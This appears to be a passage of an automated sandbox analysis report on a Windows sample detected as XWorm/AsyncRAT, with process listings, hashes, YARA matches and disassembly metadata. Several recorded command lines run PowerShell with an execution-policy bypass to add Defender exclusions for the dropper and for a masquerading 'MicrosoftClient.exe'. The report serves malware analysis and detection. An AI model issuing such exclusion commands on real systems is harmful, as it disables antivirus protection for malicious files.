                                                                                          • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000000.2129761465.0000000000CF2000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                          • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000000.2129761465.0000000000CF2000.00000002.00000001.01000000.00000003.sdmp, Author: ditekSHen
                                                                                          Reputation:low
                                                                                          Has exited:false

                                                                                          General

                                                                                          Target ID:2
                                                                                          Start time:07:22:00
                                                                                          Start date:30/10/2024
                                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\9RgE5uOJwX.exe'
                                                                                          Imagebase:0x7ff6e3d50000
                                                                                          File size:452'608 bytes
                                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:3
                                                                                          Start time:07:22:00
                                                                                          Start date:30/10/2024
                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                          Imagebase:0x7ff66e660000
                                                                                          File size:862'208 bytes
                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:5
                                                                                          Start time:07:22:07
                                                                                          Start date:30/10/2024
                                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '9RgE5uOJwX.exe'
                                                                                          Imagebase:0x7ff6e3d50000
                                                                                          File size:452'608 bytes
                                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:6
                                                                                          Start time:07:22:07
                                                                                          Start date:30/10/2024
                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                          Imagebase:0x7ff66e660000
                                                                                          File size:862'208 bytes
                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:8
                                                                                          Start time:07:22:17
                                                                                          Start date:30/10/2024
                                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\MicrosoftClient.exe'
                                                                                          Imagebase:0x7ff6e3d50000
                                                                                          File size:452'608 bytes
                                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:9
                                                                                          Start time:07:22:17
                                                                                          Start date:30/10/2024
                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                          Imagebase:0x7ff66e660000
                                                                                          File size:862'208 bytes
                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:11
                                                                                          Start time:07:22:31
                                                                                          Start date:30/10/2024
                                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'MicrosoftClient.exe'
                                                                                          Imagebase:0x7ff6e3d50000
                                                                                          File size:452'608 bytes
                                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:12
                                                                                          Start time:07:22:31
                                                                                          Start date:30/10/2024
                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                          Imagebase:0x7ff66e660000
                                                                                          File size:862'208 bytes
                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:13
                                                                                          Start time:07:23:03
                                                                                          Start date:30/10/2024
                                                                                          Path:C:\Users\user\AppData\Local\MicrosoftClient.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:"C:\Users\user\AppData\Local\MicrosoftClient.exe"
                                                                                          Imagebase:0xa00000
                                                                                          File size:166'912 bytes
                                                                                          MD5 hash:72F5F19B35B22D82D8459F5E0739C248
                                                                                          Has elevated privileges:false
                                                                                          Has administrator privileges:false
                                                                                          Programmed in:C, C++ or other language
                                                                                          Yara matches:
                                                                                          • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Local\MicrosoftClient.exe, Author: Joe Security
                                                                                          • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\MicrosoftClient.exe, Author: Joe Security
                                                                                          • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Local\MicrosoftClient.exe, Author: ditekSHen
                                                                                          Antivirus matches:
                                                                                          • Detection: 100%, Joe Sandbox ML
                                                                                          • Detection: 81%, ReversingLabs
                                                                                          Reputation:low
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:14
                                                                                          Start time:07:23:11
                                                                                          Start date:30/10/2024
                                                                                          Path:C:\Users\user\AppData\Local\MicrosoftClient.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:"C:\Users\user\AppData\Local\MicrosoftClient.exe"
                                                                                          Imagebase:0xd10000
                                                                                          File size:166'912 bytes
                                                                                          MD5 hash:72F5F19B35B22D82D8459F5E0739C248
                                                                                          Has elevated privileges:false
                                                                                          Has administrator privileges:false
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:low
                                                                                          Has exited:true

                                                                                          Disassembly

                                                                                          Reset < >

                                                                                            Execution Graph

                                                                                            Execution Coverage:19.2%
                                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                                            Signature Coverage:0%
                                                                                            Total number of Nodes:3
                                                                                            Total number of Limit Nodes:0
                                                                                            execution_graph 4103 7ffd343d12b1 4104 7ffd343d12b7 RtlSetProcessIsCritical 4103->4104 4106 7ffd343d2822 4104->4106

                                                                                            Executed Functions

                                                                                            Function 00007FFD343D6936 Relevance: .5, Instructions: 473COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 468 7ffd343d6936-7ffd343d6943 469 7ffd343d6945-7ffd343d694d 468->469 470 7ffd343d694e-7ffd343d6979 468->470 469->470 471 7ffd343d697b-7ffd343d69bf 470->471 472 7ffd343d69c0-7ffd343d6a17 470->472 471->472 476 7ffd343d6a19-7ffd343d6a22 472->476 477 7ffd343d6a83 472->477 476->477 478 7ffd343d6a24-7ffd343d6a30 476->478 479 7ffd343d6a85-7ffd343d6aaa 477->479 480 7ffd343d6a69-7ffd343d6a81 478->480 481 7ffd343d6a32-7ffd343d6a44 478->481 486 7ffd343d6aac-7ffd343d6ab5 479->486 487 7ffd343d6b16 479->487 480->479 482 7ffd343d6a46 481->482 483 7ffd343d6a48-7ffd343d6a5b 481->483 482->483 483->483 485 7ffd343d6a5d-7ffd343d6a65 483->485 485->480 486->487 489 7ffd343d6ab7-7ffd343d6ac3 486->489 488 7ffd343d6b18-7ffd343d6bc0 487->488 500 7ffd343d6bc2-7ffd343d6bcc 488->500 501 7ffd343d6c2e 488->501 490 7ffd343d6afc-7ffd343d6b14 489->490 491 7ffd343d6ac5-7ffd343d6ad7 489->491 490->488 493 7ffd343d6ad9 491->493 494 7ffd343d6adb-7ffd343d6aee 491->494 493->494 494->494 495 7ffd343d6af0-7ffd343d6af8 494->495 495->490 500->501 503 7ffd343d6bce-7ffd343d6bdb 500->503 502 7ffd343d6c30-7ffd343d6c59 501->502 510 7ffd343d6c5b-7ffd343d6c66 502->510 511 7ffd343d6cc3 502->511 504 7ffd343d6c14-7ffd343d6c2c 503->504 505 7ffd343d6bdd-7ffd343d6bef 503->505 504->502 506 7ffd343d6bf1 505->506 507 7ffd343d6bf3-7ffd343d6c06 505->507 506->507 507->507 509 7ffd343d6c08-7ffd343d6c10 507->509 509->504 510->511 513 7ffd343d6c68-7ffd343d6c76 510->513 512 7ffd343d6cc5-7ffd343d6d56 511->512 521 7ffd343d6d5c-7ffd343d6d6b 512->521 514 7ffd343d6c78-7ffd343d6c8a 513->514 515 7ffd343d6caf-7ffd343d6cc1 513->515 517 7ffd343d6c8c 514->517 518 7ffd343d6c8e-7ffd343d6ca1 514->518 515->512 517->518 518->518 519 7ffd343d6ca3-7ffd343d6cab 518->519 519->515 522 7ffd343d6d73-7ffd343d6dd8 call 7ffd343d6df4 521->522 523 7ffd343d6d6d 521->523 530 7ffd343d6dda 522->530 531 7ffd343d6ddf-7ffd343d6df3 522->531 523->522 530->531
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.3421006231.00007FFD343D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343D0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ffd343d0000_9RgE5uOJwX.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 23f461845bede5c693b74295d476c88cd9592ddd80363012ea11033b207768a2
                                                                                            • Instruction ID: 479b56665c81859cab447e395d80e39a7898fda9ee0a5e7a383f342a0d7eac4a
                                                                                            • Opcode Fuzzy Hash: 23f461845bede5c693b74295d476c88cd9592ddd80363012ea11033b207768a2
                                                                                            • Instruction Fuzzy Hash: 30F1F830A49A4D4FEBA8EF28C8557E937D1FF56310F04426EE85DC7291CF3999448B81
                                                                                            Function 00007FFD343D76E2 Relevance: .5, Instructions: 459COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.3421006231.00007FFD343D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343D0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ffd343d0000_9RgE5uOJwX.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 379b462fa47b81f8f00c23d002d61e914afdd0ace0ff115dba0c3401ce38cc49
                                                                                            • Instruction ID: 2dff8fa620d6dc27f09a80b0f981f7c1a4e0adc0cb474ae52e24e592e13119fd
                                                                                            • Opcode Fuzzy Hash: 379b462fa47b81f8f00c23d002d61e914afdd0ace0ff115dba0c3401ce38cc49
                                                                                            • Instruction Fuzzy Hash: C4E1C630A09A4D8FEBA8EF28C8657E977D1EF56310F04427AD84DC7291DF399945CB81
                                                                                            Function 00007FFD343D273D Relevance: 1.6, APIs: 1, Instructions: 145COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 144 7ffd343d273d-7ffd343d2820 RtlSetProcessIsCritical 148 7ffd343d2828-7ffd343d285d 144->148 149 7ffd343d2822 144->149 149->148
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.3421006231.00007FFD343D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343D0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ffd343d0000_9RgE5uOJwX.jbxd
                                                                                            Similarity
                                                                                            • API ID: CriticalProcess
                                                                                            • String ID:
                                                                                            • API String ID: 2695349919-0
                                                                                            • Opcode ID: fc3854d2f57365db0c98801e578bc60cc0b631b05d576c9cea56774c5fb349e4
                                                                                            • Instruction ID: f77ece349a459b2e4785ecd2b9fd381dc8b3fd2c6ae8562db19ba943fff9e702
                                                                                            • Opcode Fuzzy Hash: fc3854d2f57365db0c98801e578bc60cc0b631b05d576c9cea56774c5fb349e4
                                                                                            • Instruction Fuzzy Hash: 7B41D33190C7488FDB29DFA8D855AE9BBF0EF56311F04416ED08AD3692CB78A446CB91
                                                                                            Function 00007FFD343D12B1 Relevance: 1.6, APIs: 1, Instructions: 128COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 151 7ffd343d12b1-7ffd343d27ba 155 7ffd343d27c2-7ffd343d2820 RtlSetProcessIsCritical 151->155 156 7ffd343d2828-7ffd343d285d 155->156 157 7ffd343d2822 155->157 157->156
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.3421006231.00007FFD343D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343D0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ffd343d0000_9RgE5uOJwX.jbxd
                                                                                            Similarity
                                                                                            • API ID: CriticalProcess
                                                                                            • String ID:
                                                                                            • API String ID: 2695349919-0
                                                                                            • Opcode ID: 6689ab6bd4fa90c08361e121d6aa50b4bd4c7b87e3ffdb2554e47c46e20d61bc
                                                                                            • Instruction ID: b6dc68271a6d20b5f6bff311d5c31937de2b8573a9a38441f25f1843a296426c
                                                                                            • Opcode Fuzzy Hash: 6689ab6bd4fa90c08361e121d6aa50b4bd4c7b87e3ffdb2554e47c46e20d61bc
                                                                                            • Instruction Fuzzy Hash: 5F31F63190CA588FDB29EFACD8556F9BBF0FF56311F04012ED08AD3682CB7568468B91

                                                                                            Executed Functions

                                                                                            Function 00007FFD344D43CA Relevance: 1.3, Strings: 1, Instructions: 60COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2234757083.00007FFD344D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD344D0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_7ffd344d0000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: ;t4
                                                                                            • API String ID: 0-1770406720
                                                                                            • Opcode ID: c977ecfbed0fdb194a123006bbbc7561494cd488e813089b45a2833e7313dad0
                                                                                            • Instruction ID: cf32685f9f8fa92927d25eed80631a2c3aa101eb3f0fe4eab9b1eaffd1c214e4
                                                                                            • Opcode Fuzzy Hash: c977ecfbed0fdb194a123006bbbc7561494cd488e813089b45a2833e7313dad0
                                                                                            • Instruction Fuzzy Hash: 2B110232B0E9890FE6A1E76CA0B55B8BBD1EF4232074A00B6D15CDB197DE6DAC008340
                                                                                            Function 00007FFD344D4073 Relevance: .2, Instructions: 183COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2234757083.00007FFD344D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD344D0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_7ffd344d0000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: c1de134973d058e3608fb065b799e296a2e91f4cb3227384d6209c5f747ca701
                                                                                            • Instruction ID: 32f5532ac11ff0565dcde244dbceb4d2c7f70841c8b1c97eb503d3cd37d4f09a
                                                                                            • Opcode Fuzzy Hash: c1de134973d058e3608fb065b799e296a2e91f4cb3227384d6209c5f747ca701
                                                                                            • Instruction Fuzzy Hash: CA515832B0EA960FE7A9DA5C64A5178B7D2EF9B221B1900BBC24DC7297DD1CEC058340
                                                                                            Function 00007FFD34409758 Relevance: .1, Instructions: 130COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2234365690.00007FFD34400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34400000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_7ffd34400000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: efe06a3131d1ca7e10752989dbfb88c025c50b58f090a19863764ec650230faf
                                                                                            • Instruction ID: abffe75cb2001db7060ee77653836fbc97e6e3580578ff83418ec59bc844f708
                                                                                            • Opcode Fuzzy Hash: efe06a3131d1ca7e10752989dbfb88c025c50b58f090a19863764ec650230faf
                                                                                            • Instruction Fuzzy Hash: 7F31E972A1CB489FDB589F5C98466A9BBE0FBA9310F00412FE449D3252DA74E855CBC2
                                                                                            Function 00007FFD3440A62C Relevance: .1, Instructions: 101COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2234365690.00007FFD34400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34400000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_7ffd34400000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: e4a8afc1ef8bb0667297431a4e3584a88e3bef654bd2674753fd98fe83d54446
                                                                                            • Instruction ID: c253437e48125b9f802b1fb9882c67a69be4fc3a6946e89e07b91a8690799bdf
                                                                                            • Opcode Fuzzy Hash: e4a8afc1ef8bb0667297431a4e3584a88e3bef654bd2674753fd98fe83d54446
                                                                                            • Instruction Fuzzy Hash: 9F31063190CB4C4FDB59DFACD84A7E97BF0EBA6320F04416BD049D3156DA74A41ACB92
                                                                                            Function 00007FFD344D40BF Relevance: .1, Instructions: 96COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2234757083.00007FFD344D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD344D0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_7ffd344d0000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: a0fac42f0a8f74160e4f9ce345e48abfa0aeb5148a8b77820da6b9d87f774f26
                                                                                            • Instruction ID: 8d915474e8fca7470735aace855a7549ff154831f147075c5559ad1ae5b2ae08
                                                                                            • Opcode Fuzzy Hash: a0fac42f0a8f74160e4f9ce345e48abfa0aeb5148a8b77820da6b9d87f774f26
                                                                                            • Instruction Fuzzy Hash: E2210532B0EA970FE7A5DB5864B5138A6C2EF5B211B4A00BAD25DC71ABCD1CEC049300
                                                                                            Function 00007FFD344D681E Relevance: .1, Instructions: 60COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2234757083.00007FFD344D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD344D0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_7ffd344d0000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 00387e8e3b0ebafc412e8f2e4f369dc5750753f127b34f7cd1b02cf5ce7b6d51
                                                                                            • Instruction ID: 7cb9824be65944e4dc68716383149a2467755e5981410d035341273e6a743d75
                                                                                            • Opcode Fuzzy Hash: 00387e8e3b0ebafc412e8f2e4f369dc5750753f127b34f7cd1b02cf5ce7b6d51
                                                                                            • Instruction Fuzzy Hash: 30110672B0FA894FEBA1EA9880A45687BE2EF57310F0500BFD54DDB197D9686845C350
                                                                                            Function 00007FFD342EE6BF Relevance: .1, Instructions: 54COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2233994847.00007FFD342ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD342ED000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_7ffd342ed000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 84e4da84efb7a51fce14da70d86f151c2ca1ddb5975049c754ac93f51fb58f0f
                                                                                            • Instruction ID: a226bbc77e492e2d2cab390f7f5cceeb0ba974dfe887818e6e4082ad9372c7dd
                                                                                            • Opcode Fuzzy Hash: 84e4da84efb7a51fce14da70d86f151c2ca1ddb5975049c754ac93f51fb58f0f
                                                                                            • Instruction Fuzzy Hash: D2014F3160CE088F9BA4EF1EE48595237E0FB98320710069AD41DC755AD735F891CBC1
                                                                                            Function 00007FFD344033B5 Relevance: .0, Instructions: 49COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2234365690.00007FFD34400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34400000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_7ffd34400000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                                                                            • Instruction ID: 3306c9528c3651b4f0bbc2bd9bcccaf5aae1111e749d9882c440da8263015227
                                                                                            • Opcode Fuzzy Hash: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                                                                            • Instruction Fuzzy Hash: B701A73021CB0C4FD748EF4CE091AA5B7E0FB85320F10062DE58AC3651DA36E892CB41
                                                                                            Function 00007FFD3440A2A9 Relevance: .0, Instructions: 24COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2234365690.00007FFD34400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34400000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_7ffd34400000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 2411d49aff9c963e19a78f09db482460ef6301505b1b93e3acf6f94d8bc092be
                                                                                            • Instruction ID: a960d5b009d1f3ba4c9604108c1bcde348d77f93f35a1129ebe601d7d716a1f8
                                                                                            • Opcode Fuzzy Hash: 2411d49aff9c963e19a78f09db482460ef6301505b1b93e3acf6f94d8bc092be
                                                                                            • Instruction Fuzzy Hash: DDE0ED75904A4D8FDB44EF18D4554A9BBA0FB65201B01456EE409C7120D7759558CB82

                                                                                            Non-executed Functions

                                                                                            Function 00007FFD34408995 Relevance: 5.1, Strings: 4, Instructions: 133COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2234365690.00007FFD34400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34400000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_7ffd34400000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: K_^$K_^$K_^$K_^
                                                                                            • API String ID: 0-4267328068
                                                                                            • Opcode ID: 1d946ab97b089edc0a223e5bb3ce2b76c45bdeaa2a97b7a5ff01296199c8311a
                                                                                            • Instruction ID: 0b20d80ede7901d8edd5114ffbd1dd679f0ae62b6b601d2a3359bad827904a7d
                                                                                            • Opcode Fuzzy Hash: 1d946ab97b089edc0a223e5bb3ce2b76c45bdeaa2a97b7a5ff01296199c8311a
                                                                                            • Instruction Fuzzy Hash: 7241A0A3A0E6C21FE757572889B61D6BFA0EF13324B0E01F7C284CB487ED5D1417A642
                                                                                            Function 00007FFD34408BFA Relevance: 5.1, Strings: 4, Instructions: 85COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2234365690.00007FFD34400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34400000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_7ffd34400000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: K_^4$K_^7$K_^F$K_^J
                                                                                            • API String ID: 0-377281160
                                                                                            • Opcode ID: 1337c1854dd59eb83ea9a8eb30e63dcf3290b25af5210be026440cbc330f0a7a
                                                                                            • Instruction ID: 1eb7d75e597954ccba82fa12fd3861bc3740c822279495172e41c573a8703b27
                                                                                            • Opcode Fuzzy Hash: 1337c1854dd59eb83ea9a8eb30e63dcf3290b25af5210be026440cbc330f0a7a
                                                                                            • Instruction Fuzzy Hash: ED2187B770912A6ED7123BBCB8145EA3BB4CF9827535502B3D098DB003EC14B1CB8AC0

                                                                                            Executed Functions

                                                                                            Function 00007FFD344B4073 Relevance: 1.4, Strings: 1, Instructions: 183COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2333651167.00007FFD344B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD344B0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_7ffd344b0000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: 8>o4
                                                                                            • API String ID: 0-4194255893
                                                                                            • Opcode ID: 8f123999aa2540e4797959d679c25a25abf81500eb25832ae45811cb3e14523a
                                                                                            • Instruction ID: b95c4a150f23d515df43e1c690831e88f7a075b6f17c18e978fd6c9961fb8a99
                                                                                            • Opcode Fuzzy Hash: 8f123999aa2540e4797959d679c25a25abf81500eb25832ae45811cb3e14523a
                                                                                            • Instruction Fuzzy Hash: B2515732F0CE960FE7A9DA5C64A517477D2EF92221B1900BBC28DC729BDD5DEC068341
                                                                                            Function 00007FFD344B40BF Relevance: 1.3, Strings: 1, Instructions: 96COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2333651167.00007FFD344B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD344B0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_7ffd344b0000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: 8>o4
                                                                                            • API String ID: 0-4194255893
                                                                                            • Opcode ID: bf8d02fa90ad4f5ca9190c25eafabbdce2f754d4398acd4d3104bcc0c0e15778
                                                                                            • Instruction ID: 74b95c8fc3011fc3d49d5383302ddfad0950f1ccae530fd6ffc2011fe5dd55fd
                                                                                            • Opcode Fuzzy Hash: bf8d02fa90ad4f5ca9190c25eafabbdce2f754d4398acd4d3104bcc0c0e15778
                                                                                            • Instruction Fuzzy Hash: A721F233F0DA970FE7A5DB5C64B917466D2EF52211B4A00BAD28DC72ABCE9DEC059301
                                                                                            Function 00007FFD344B43CA Relevance: 1.3, Strings: 1, Instructions: 60COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2333651167.00007FFD344B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD344B0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_7ffd344b0000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: p>o4
                                                                                            • API String ID: 0-2808034503
                                                                                            • Opcode ID: 63571b50165b52c463f10a4089ba01b8a3aa23e833620106e2a6ce1aed8b0cb7
                                                                                            • Instruction ID: d6ff988d9362fa4061a46bafee085b4c304d7de8415c6949b24306942ee84777
                                                                                            • Opcode Fuzzy Hash: 63571b50165b52c463f10a4089ba01b8a3aa23e833620106e2a6ce1aed8b0cb7
